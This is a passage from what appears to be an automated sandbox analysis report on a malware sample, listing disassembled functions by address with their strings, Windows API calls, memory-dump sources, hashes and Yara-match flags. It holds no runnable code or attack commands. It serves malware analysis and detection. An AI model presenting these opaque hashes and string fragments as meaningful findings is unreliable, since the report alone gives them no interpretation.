{7y9, xrefs: 004272C7
UGBY, xrefs: 00427708
+K!M, xrefs: 00427356
U'g), xrefs: 004272F3
;[0], xrefs: 0042732A
*W.Y, xrefs: 0042731F
$&, xrefs: 004275AF
!, xrefs: 00427452

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON

Download Yara Rule

Strings

Fg)i, xrefs: 00423E56
7N1@, xrefs: 00423ED0, 00423EE1
OU, xrefs: 00423CFC
{\}, xrefs: 00423E3E
WE, xrefs: 00423D04
/G$I, xrefs: 00423E16
A[, xrefs: 00423D14

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 00419F30 Relevance: 12.2, APIs: 2, Strings: 4, Instructions: 1664COMMON

Download Yara Rule

APIs

Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

FreeLibrary.KERNEL32(?), ref: 0041A6BD
FreeLibrary.KERNEL32(?), ref: 0041A77B

Strings

46, xrefs: 0041A3EA
/ , xrefs: 0041A402
Wu, xrefs: 0041A6BD, 0041A77B
/,-, xrefs: 0041A991

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: / $/,-$Wu$46
API String ID: 764372645-3330591033
Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B

Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON

Download Yara Rule

Strings

_q, xrefs: 0041D1C5
xy, xrefs: 0041D23E
0u4w, xrefs: 0041D236
qr, xrefs: 0041D063
p8`;, xrefs: 0041CDBD
SV, xrefs: 0041CF29
KT, xrefs: 0041CF31
Q, xrefs: 0041CF39

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
API String ID: 0-1826372655
Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A

Function 0098A197 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 0098A924
FreeLibrary.KERNEL32(?), ref: 0098A9E2

Strings

/ , xrefs: 0098A669
46, xrefs: 0098A651
/,-, xrefs: 0098ABF8

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: / $/,-$46
API String ID: 3664257935-479303636
Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction ID: d1d035f23ce5ae8347dc15b1d213c47a5197b8e68bd1b05afd337ca0ca571b50
Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction Fuzzy Hash: 2CB255766483409FE320ABA5C884B6FBBE2ABD5300F1CC82EE5D49B351D7759C458B93

Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

jqci, xrefs: 0040901D
|$Nb, xrefs: 00409025
(, xrefs: 00409065
ye{|, xrefs: 00409035
x|j~, xrefs: 0040904D
wkw6, xrefs: 00409045
z/6q, xrefs: 0040903D

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A

Function 009791B7 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

|$Nb, xrefs: 0097928C
wkw6, xrefs: 009792AC
z/6q, xrefs: 009792A4
x|j~, xrefs: 009792B4
ye{|, xrefs: 0097929C
(, xrefs: 009792CC
jqci, xrefs: 00979284

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 2ab32e716e6b5310e30004f6627128c004544e4c9c8f3d4aae615c7544601205
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: 7461266264C3C68AD3119F3988A076AFFE4DFA3310F18896DE4D54B392D369CA09D716

Function 009797E7 Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

Tiec, xrefs: 00979BCA
PK, xrefs: 00979C48
+8=>, xrefs: 009799E9
\, xrefs: 009799F1
r, xrefs: 0097985B
#4<7, xrefs: 009799D9

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: #4<7$+8=>$PK$Tiec$\$r
API String ID: 0-1906979145
Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
Instruction ID: 0d21d0b2e94fcf1cee7bd5a012ec3c1cf3442b66815ac222ff72083cef29fe7d
Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
Instruction Fuzzy Hash: 85D12576A0C3408BD718CF25C89166BBBE6EFD1318F18892DE4EA9B351D738C905CB46

Function 00978AB7 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00978B83
GetCurrentThreadId.KERNEL32 ref: 00978B8C
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00978C42
GetForegroundWindow.USER32 ref: 00978C9A

Part of subcall function 0097C7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 0097C7CA

Part of subcall function 0097B5F7: FreeLibrary.KERNEL32(00978D1F), ref: 0097B5FD
Part of subcall function 0097B5F7: FreeLibrary.KERNEL32 ref: 0097B61E

ExitProcess.KERNEL32 ref: 00978D38

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction ID: 8211e22c8e5a009f42fef04c62f87f8ea2060f2e8cab9fcaf49f71196b9e2aa3
Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction Fuzzy Hash: 255196B7F502180BD72CAEA9CC4A7AA75878BC5710F1EC13D5948DB7D2EEB8880182C5

Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

-+, xrefs: 0041F11A
hI, xrefs: 0041E98F
/, xrefs: 0041E9BE
", xrefs: 0041F121

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

Function 0098EA27 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

/, xrefs: 0098EC25
", xrefs: 0098F388
hI, xrefs: 0098EBF6
-+, xrefs: 0098F381

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction ID: ce37c52a56d25652acd061640e7c51263ec1ef35c7e282e77f2f56a790711500
Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction Fuzzy Hash: A542287550C3818FC721EF24C850A6EBBE1AF92314F188A6CE8E99B392D735D905CB56

Function 0098D230 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

qr, xrefs: 0098D2CA
_q, xrefs: 0098D42C
0u4w, xrefs: 0098D49D
xy, xrefs: 0098D4A5

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: 0u4w$_q$qr$xy
API String ID: 0-1225007230
Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction ID: ac7f2ff427ecac32fbb3f245bd637df81d2b7a613ddab081dade9cf557044c4f
Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction Fuzzy Hash: DF9101B1A093118BC714DF68C89276BB3F1EF95324F18992DE8CA8B3D1E3789905C756

Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96

Function 0099CCB0 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

Hs, xrefs: 0099CF4A
v, xrefs: 0099D02D
,JHj, xrefs: 0099CFC4
bc, xrefs: 0099D104

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: a87d6eb48a45fe8ff52235d781fbb03449574e7da1fee1581c09023d4d2b12a0
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: 9A916B71A0C3D08BE735CB3988517ABBBD29FE3314F18896DD4DA9B382C6754805CB92

Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96

Function 0099CD89 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

Hs, xrefs: 0099CF4A
v, xrefs: 0099D02D
,JHj, xrefs: 0099CFC4
bc, xrefs: 0099D104

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: fcb678daa88079722f9cd9083510964400edce40825e836e143d158f8e8fab84
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: 01916F71A0C3D08BE735CB3988517ABBBD29FE3314F18896DD4DA9B782C6754805CB52

Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96

Function 0099CD37 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

Hs, xrefs: 0099CF4A
v, xrefs: 0099D02D
,JHj, xrefs: 0099CFC4
bc, xrefs: 0099D104

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: 9bec9a24fa577bca9137a6161189835940462fb15157197b57d6de2fb20c2757
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 2F915C71A083D08BE7348B3988517ABBBD29FE3314F18896DD4D99B782C6754805CB52

Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

v, xrefs: 0042CDC6
Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96

Function 0099CD78 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

Hs, xrefs: 0099CF4A
v, xrefs: 0099D02D
,JHj, xrefs: 0099CFC4
bc, xrefs: 0099D104

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 74f39ccc9f0b8ad1d8a44f84057773be362581d8ed0ccb0e90f5caf6be599772
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 8B8148719083D08BE734CF3988617ABBBD2AFE3304F18895DD4C95B686C6754809CB92

Function 00994031 Relevance: 5.1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

Strings

7N1@, xrefs: 00994137, 00994148
/G$I, xrefs: 0099407D
Fg)i, xrefs: 009940BD
{\}, xrefs: 009940A5

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: /G$I$7N1@$Fg)i${\}
API String ID: 0-149357369
Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction ID: 65fc904a4671098d00ec35acdf5b85b1509ba10d4e37e8e2f97b4971ac360a40
Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction Fuzzy Hash: 342188B551D3809BC314CF66984161BFBE2BBD2704F29A92DF0C85B255D7748902CF8B

Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON

Download Yara Rule

Strings

,, xrefs: 004183A1
r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitializeThunk
String ID: ,$i$r}A
API String ID: 2994545307-2114006112
Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796

Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
gfff, xrefs: 00417747
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: gfff$i$r}A
API String ID: 0-3931832132
Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786

Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

C], xrefs: 0041D471
|F, xrefs: 0041D40A
34, xrefs: 0041D46A

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A

Function 0098D5E7 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

C], xrefs: 0098D6D8
34, xrefs: 0098D6D1
|F, xrefs: 0098D671

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction ID: cbec7ca5f543176144615905cdc90eaf51481ec3a57f723a37a2cd029921c121
Opcode Fuzzy Hash: 1eada1f2f144597b9c88acb577afbeb3828b2161becaae570a9f1b2935c392b3
Instruction Fuzzy Hash: 4AC130B69093518BC720DF28C88166BB3F6FFD5314F18895CE8D58B390E7799905CB92

Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

Ef, xrefs: 0042E24E
sWK), xrefs: 0042E049
TQ][, xrefs: 0042E307

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7

Function 0099E250 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

TQ][, xrefs: 0099E56E
Ef, xrefs: 0099E4B5
sWK), xrefs: 0099E2B0

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction ID: 8b169a8c463f5ce37b8d51ad3cdb388673cab900b0a36fe90e5501ea90993162
Opcode Fuzzy Hash: 34b98bce0e098604bc8c30d8401df6549c9b0a7e4ea807236a6bc4bf95e6afdf
Instruction Fuzzy Hash: 9DB1D23051D3D08EDB39CF2994907ABBBE49FA7304F08499DD4D95B282DB75850ACB63

Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

+|-~, xrefs: 0041B306
_, xrefs: 0041B428
/pqr, xrefs: 0041B30E

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

